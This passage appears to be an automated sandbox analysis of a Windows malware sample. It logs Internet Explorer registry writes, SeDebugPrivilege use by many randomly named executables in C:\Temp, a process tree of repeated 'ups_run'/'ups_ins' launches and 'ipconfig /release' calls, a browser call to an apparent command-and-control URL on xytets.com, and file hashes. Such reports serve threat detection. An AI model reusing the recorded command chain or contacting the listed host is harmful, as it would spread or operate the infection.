| Set value (data) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000fcb9c6b319d08342a9ed2bf25da18ab0000000000200000000001066000000010000200000006825e099f7be78400aeca8c813c9be085e9a858333164a16505b30518e556973000000000e80000000020000200000008af9c9b2ee7dbe097e3feb69f214a97a2440b8ae6a3d7ad089e3c84b96e08e6320000000ffd3f30b8f1dd09d1cd12230fc8c4636627b3a1e8a3e7a8107ec2c177697afa240000000c6a849490abc84dc992fc7b5f05aeff8514d8652a893df228a2dd93ff351db7ae6f3d8a2ab451848c90e4ec43076553598a007e1dbc5bfe63144a6f40f072fc3 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3971427848" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 00ed3eed2e71db01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000fcb9c6b319d08342a9ed2bf25da18ab000000000020000000000106600000001000020000000fd4fb3445c6722a2d381e57488e7ab7dddc0478f1ff590dd3e7b754775f67843000000000e80000000020000200000009b3141c7de4da346fa576f75cc308c1b61e8335ea95400ac8d8f14f475115c2420000000702a04fd2665ee90b691713bcbc54dd45e2a75bdb91f65e01f13168992d17daf40000000a8ca3a4edd20bd2e5fa85def9edaffdebcfe3be6d08620b95e6e1f4c21d40c5d6c575366cc3af75a953a2eacdfc3a1db15981c4d04eb5b3d62d686f141a031aa | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e0444ded2e71db01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{180D4172-DD22-11EF-AF2A-DA67B56E6C1B} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31158574" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3973147440" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_kicavpnhfa.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_kfzxrpkhcz.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_zusmkecwup.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_zxrpjhczur.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_trljebwuom.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_ojgbztrljd.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_oigtqljdbv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_fdyvqnigay.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_axsqkicaus.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_usmkfcxvpn.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_zxspkicamk.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_xrpjhczusm.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_uomgezwroj.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_rljdbwtomg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_wqoigbytql.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_tnlfdyvqoi.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_qnigaysqki.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_qkicausnkf.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_upnhfzxspk.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Temp\i_smkecwupmh.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe
"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe"
C:\Temp\dxvpnifaysqkicav.exe
C:\Temp\dxvpnifaysqkicav.exe run
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://xytets.com:2345/t.asp?os=home
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3468 CREDAT:17410 /prefetch:2
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\kicavpnhfa.exe ups_run
C:\Temp\kicavpnhfa.exe
C:\Temp\kicavpnhfa.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_kicavpnhfa.exe ups_ins
C:\Temp\i_kicavpnhfa.exe
C:\Temp\i_kicavpnhfa.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\kfzxrpkhcz.exe ups_run
C:\Temp\kfzxrpkhcz.exe
C:\Temp\kfzxrpkhcz.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_kfzxrpkhcz.exe ups_ins
C:\Temp\i_kfzxrpkhcz.exe
C:\Temp\i_kfzxrpkhcz.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\zusmkecwup.exe ups_run
C:\Temp\zusmkecwup.exe
C:\Temp\zusmkecwup.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_zusmkecwup.exe ups_ins
C:\Temp\i_zusmkecwup.exe
C:\Temp\i_zusmkecwup.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\zxrpjhczur.exe ups_run
C:\Temp\zxrpjhczur.exe
C:\Temp\zxrpjhczur.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_zxrpjhczur.exe ups_ins
C:\Temp\i_zxrpjhczur.exe
C:\Temp\i_zxrpjhczur.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\trljebwuom.exe ups_run
C:\Temp\trljebwuom.exe
C:\Temp\trljebwuom.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_trljebwuom.exe ups_ins
C:\Temp\i_trljebwuom.exe
C:\Temp\i_trljebwuom.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\ojgbztrljd.exe ups_run
C:\Temp\ojgbztrljd.exe
C:\Temp\ojgbztrljd.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_ojgbztrljd.exe ups_ins
C:\Temp\i_ojgbztrljd.exe
C:\Temp\i_ojgbztrljd.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\oigtqljdbv.exe ups_run
C:\Temp\oigtqljdbv.exe
C:\Temp\oigtqljdbv.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_oigtqljdbv.exe ups_ins
C:\Temp\i_oigtqljdbv.exe
C:\Temp\i_oigtqljdbv.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\fdyvqnigay.exe ups_run
C:\Temp\fdyvqnigay.exe
C:\Temp\fdyvqnigay.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_fdyvqnigay.exe ups_ins
C:\Temp\i_fdyvqnigay.exe
C:\Temp\i_fdyvqnigay.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\axsqkicaus.exe ups_run
C:\Temp\axsqkicaus.exe
C:\Temp\axsqkicaus.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_axsqkicaus.exe ups_ins
C:\Temp\i_axsqkicaus.exe
C:\Temp\i_axsqkicaus.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\usmkfcxvpn.exe ups_run
C:\Temp\usmkfcxvpn.exe
C:\Temp\usmkfcxvpn.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_usmkfcxvpn.exe ups_ins
C:\Temp\i_usmkfcxvpn.exe
C:\Temp\i_usmkfcxvpn.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\zxspkicamk.exe ups_run
C:\Temp\zxspkicamk.exe
C:\Temp\zxspkicamk.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_zxspkicamk.exe ups_ins
C:\Temp\i_zxspkicamk.exe
C:\Temp\i_zxspkicamk.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\xrpjhczusm.exe ups_run
C:\Temp\xrpjhczusm.exe
C:\Temp\xrpjhczusm.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_xrpjhczusm.exe ups_ins
C:\Temp\i_xrpjhczusm.exe
C:\Temp\i_xrpjhczusm.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\uomgezwroj.exe ups_run
C:\Temp\uomgezwroj.exe
C:\Temp\uomgezwroj.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_uomgezwroj.exe ups_ins
C:\Temp\i_uomgezwroj.exe
C:\Temp\i_uomgezwroj.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\rljdbwtomg.exe ups_run
C:\Temp\rljdbwtomg.exe
C:\Temp\rljdbwtomg.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_rljdbwtomg.exe ups_ins
C:\Temp\i_rljdbwtomg.exe
C:\Temp\i_rljdbwtomg.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\wqoigbytql.exe ups_run
C:\Temp\wqoigbytql.exe
C:\Temp\wqoigbytql.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_wqoigbytql.exe ups_ins
C:\Temp\i_wqoigbytql.exe
C:\Temp\i_wqoigbytql.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\tnlfdyvqoi.exe ups_run
C:\Temp\tnlfdyvqoi.exe
C:\Temp\tnlfdyvqoi.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_tnlfdyvqoi.exe ups_ins
C:\Temp\i_tnlfdyvqoi.exe
C:\Temp\i_tnlfdyvqoi.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\qnigaysqki.exe ups_run
C:\Temp\qnigaysqki.exe
C:\Temp\qnigaysqki.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_qnigaysqki.exe ups_ins
C:\Temp\i_qnigaysqki.exe
C:\Temp\i_qnigaysqki.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\qkicausnkf.exe ups_run
C:\Temp\qkicausnkf.exe
C:\Temp\qkicausnkf.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_qkicausnkf.exe ups_ins
C:\Temp\i_qkicausnkf.exe
C:\Temp\i_qkicausnkf.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\upnhfzxspk.exe ups_run
C:\Temp\upnhfzxspk.exe
C:\Temp\upnhfzxspk.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_upnhfzxspk.exe ups_ins
C:\Temp\i_upnhfzxspk.exe
C:\Temp\i_upnhfzxspk.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\smkecwupmh.exe ups_run
C:\Temp\smkecwupmh.exe
C:\Temp\smkecwupmh.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_smkecwupmh.exe ups_ins
C:\Temp\i_smkecwupmh.exe
C:\Temp\i_smkecwupmh.exe ups_ins
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.129.81.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.98.51.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xytets.com | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xytets.com | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.21.199.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp |
Files
C:\Temp\dxvpnifaysqkicav.exe
| MD5 | 44def011da7bae1dae45f92e128fa85f |
| SHA1 | 76d04f9856441bed55e1811270db0baa6ef02ff3 |
| SHA256 | de5acecc1da4f49fd7f63018c91cfacb38d125d83d5a2ef7faefecbcb65fca86 |
| SHA512 | 6086342f564d3ba422c88858642beacf61040f0b1afd75d3377bcfd7a24bdc3c7ca499a265c5feeda14180a6380be8141d7e5a07d2db2a3a334040dff661db54 |
C:\Temp\CreateProcess.exe
| MD5 | e055efecfbdc7954ce003c795f5ed9c1 |
| SHA1 | c79876cf3c73987494e466d2b248d114fb1003af |
| SHA256 | cb2a34c2ddc6ccd8a96f9fbea6519d0c96d35b6f55d88fb627fd3f4c03ffb14d |
| SHA512 | 1a1b2a5eefc2feebb316cb28fde689c44dd05651bcd5597dc4a693402c7c804fd8b42ed8d06fa604bde20ed8dca79ad6cc15d1f876de027474842da1b66c3c86 |
C:\Temp\kicavpnhfa.exe
| MD5 | 530796522950afebfdc8f2bdbb279e49 |
| SHA1 | f9fd78a75543bce2d17fe1575b58b2c914ed44a4 |
| SHA256 | 9a41e3958ccc92deeb851a33f8a32162ed709223243b1f29b0a9c67fb08cf2a9 |
| SHA512 | 9b86ed072aa023ab851e9a0bf86777d1f41afe485a4b1a50a54513566578afff62697eeb1cf8d40599b63eebcf1ff121fa0c6ea0561b32e13b7bb247b7362956 |
C:\Temp\i_kicavpnhfa.exe
| MD5 | b16e64309bc17abb42371096ef067195 |
| SHA1 | de243f1013861c96c2a4a2141e56b8e5659496f3 |
| SHA256 | e1efc058c0b97b1d51a639151e67d0603c201418eeef78d91dbfe304562d96ca |
| SHA512 | 0339d41682609d623d95b80423a8b056869b5dbbad1cdca09537b370404dcd6855b0b2ce5e0058a979088b0b04fbb0cb3a205755a7a7d443820c4f4ab6f7f53f |
C:\Temp\kfzxrpkhcz.exe
| MD5 | d09cdde38b767563387ba2dba4187488 |
| SHA1 | 04457550875c9c8e04b93804374a7ba702382d59 |
| SHA256 | 1d8f9c461d6cb9e71d366568390aa016ba7d39cb6a2535318dada169c8e144ed |
| SHA512 | d600c363e20a8e43f447acd709d549887858ca9284de1a9e8266ee49c19bbcdc8e06c0344a652f59068eec992df3fd973556ff77602e07736b2ac2b31d72dabb |
C:\Temp\i_kfzxrpkhcz.exe
| MD5 | 835e6cb6983dbf37f721455f5fe7e987 |
| SHA1 | 17f98fdf22d4e43e3cb0069940053bcb365dc6b5 |
| SHA256 | 453ff54fec9acb757ddb4370300a61eae80238f01d8757908e9c0c09a7aa9992 |
| SHA512 | be1ce2152fb1a3bac77093ad0866a317082af493d6cf02c02846e06ee3d5949ac55b68bfd37a742e4b68e124602af2238d5471d93909ebe7bc2ae37ebb8ba214 |
C:\Temp\zusmkecwup.exe
| MD5 | 9739d6217c3d16edda951e570c7fe103 |
| SHA1 | b6d8afb168b8d7e5d0f9f962df9e77677a0a7286 |
| SHA256 | 5070fa3741cf35c73d55a5afba7b28c460234d7a1a44791db098e4f29fdf832d |
| SHA512 | ae9caa342dd819f96c249a3a4e2d3b233d2f2c853a28c0591eac2b8310f55083bbec5a53d218b104cd4a59d970545ff63e1e70ba41c80ccc9b517b828797d12c |
C:\Temp\i_zusmkecwup.exe
| MD5 | 7754ca99a9614c62b630fe050626ba48 |
| SHA1 | d9f4d3079a9ce932b0acb9aef1eed2dab8f41f49 |
| SHA256 | 1fef18d0139349b965aec7716b6732107c212a7c8670a866e0049a30d03aa8ec |
| SHA512 | 673c91a3f2703d59f9bb86061bd9690eda986cb8d2f81840af0531b0830e187ae22542b5ecb1d78d9bb24505438b58420cd857e6fd8e142090db765165d54a7f |
C:\Temp\zxrpjhczur.exe
| MD5 | 91970ad64ee323f5b95af40f413922ec |
| SHA1 | 6d09bf0d515ea78842b6febefc4c979ca544e77f |
| SHA256 | 07b79cd1c24e41c6f24795162d7e5656d46d9663fed13fa57bf8d4e24d986b8f |
| SHA512 | aa82136a12cd01e84d527e4d48d49e4658f99da4fd8012066533058dd1477e33f771715231e7166e9ac62536e589f98d770b952005326c09c586f743afb72c7d |
C:\Temp\i_zxrpjhczur.exe
| MD5 | 36ed5c47843368dcc32845f3f11f6e06 |
| SHA1 | 4498e5419bc9521fd1ddc06900926612352c901f |
| SHA256 | 36b5dbcf7f3ba7663124749e61af020dc9721b4353a252b8b0c6c1c886cee444 |
| SHA512 | ade4a67e2c23abf7f291584f8f585ce7f371279a9a22ba3790541ff1b42000f0053d6628fac563c2ef53ae7e5dfd0294d9d6817741a65a69853679dbd6e53b08 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
| MD5 | 65ff4e1a660b03c192195dc09416d8a8 |
| SHA1 | c8e9c1b5d0e74e2f581eaa06d77db42ddb2b24b9 |
| SHA256 | 25f890730498e80c6b85f0ca869917f45af6cadbb427695a615181eac3285dc2 |
| SHA512 | 3efa3c79d74861659b4e6e97b362fb4943eeae2e81425029bbf407fb2c4c914bc2d2b43bc8164e9ed050cdb24f411a8582e086eb3557227ad79ec2256c5a52ba |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
| MD5 | bd4fd3d4277e6b560fe9824b76237114 |
| SHA1 | dc1f3500398cff1040cef8e053aa76b33c33da15 |
| SHA256 | ffec78fd67cf61e5dd5a2735d04c423e700f6ab348ca789d36a2734aa99a6636 |
| SHA512 | ffb5a07b2601eda753284322519b85aca75d6f820e69152cffaba775dac5336254919ea05a4dc118859e4b1ad83e10942c2a588028c4c1151f587d0603bf76ce |
C:\Temp\trljebwuom.exe
| MD5 | 63552f86aa0ac58f737c21a1b2453e35 |
| SHA1 | 77c7836e1df23fa5b0f75db957a22c46bf7f2b0f |
| SHA256 | 500f4eccdd7555c2f8d07e04a6ba4825ccee89414ac9f9c65fd0f58a1b9cb55b |
| SHA512 | 9258abb36c26d8d2eb6e2f2e1515400a0c92cbb0ff41d8dfe6586d105c6e5689933f6f67e2f74f334f57a66d5d20041a9cd3170ac90e1ff737bbaf47f34dfda5 |
C:\Temp\i_trljebwuom.exe
| MD5 | be8784cd03175a75202a939c18f97a21 |
| SHA1 | 476904db3d427225d0ebd6aeb4b98d69a8f31e14 |
| SHA256 | 45d8169b998290b9b6eebf682b25c2687874983a7304b35bde76687b21ae8a0f |
| SHA512 | 65c375f52b984a516700b51360d8be307bc04f77a18180a13fadbe1c92c94f9fbbaf9cf1f9c73c3c756be304ac2ea19f94db7d0f4e2ad09ad20721b642093d19 |
C:\Temp\ojgbztrljd.exe
| MD5 | 999f6444aa8fe09d220bfdc1fe513f22 |
| SHA1 | ad04fb5096ea2a5d642b2d395e7bbbe16b6010d6 |
| SHA256 | b29267dcad1c23d32bb4e5265e9cd168de9227078f699e7d3048ac23064800a8 |
| SHA512 | 2fde865bc28ce683c688fa863413d0f51fc3142c8080ec4bcdca12c2fa2ce376309f393d96f267fac54e7e0c870eec26bd0d7c5bad76a80c104570f294a48dae |
C:\Temp\i_ojgbztrljd.exe
| MD5 | c8f9438ea7b2f682190840e9594715ee |
| SHA1 | f9f06b3a74e473a50dc837ff16d12b4f63c1e0bd |
| SHA256 | a1cfac4ae8324d561c13bf04c25c1bdae171ff13260427f95961b8e7c8404305 |
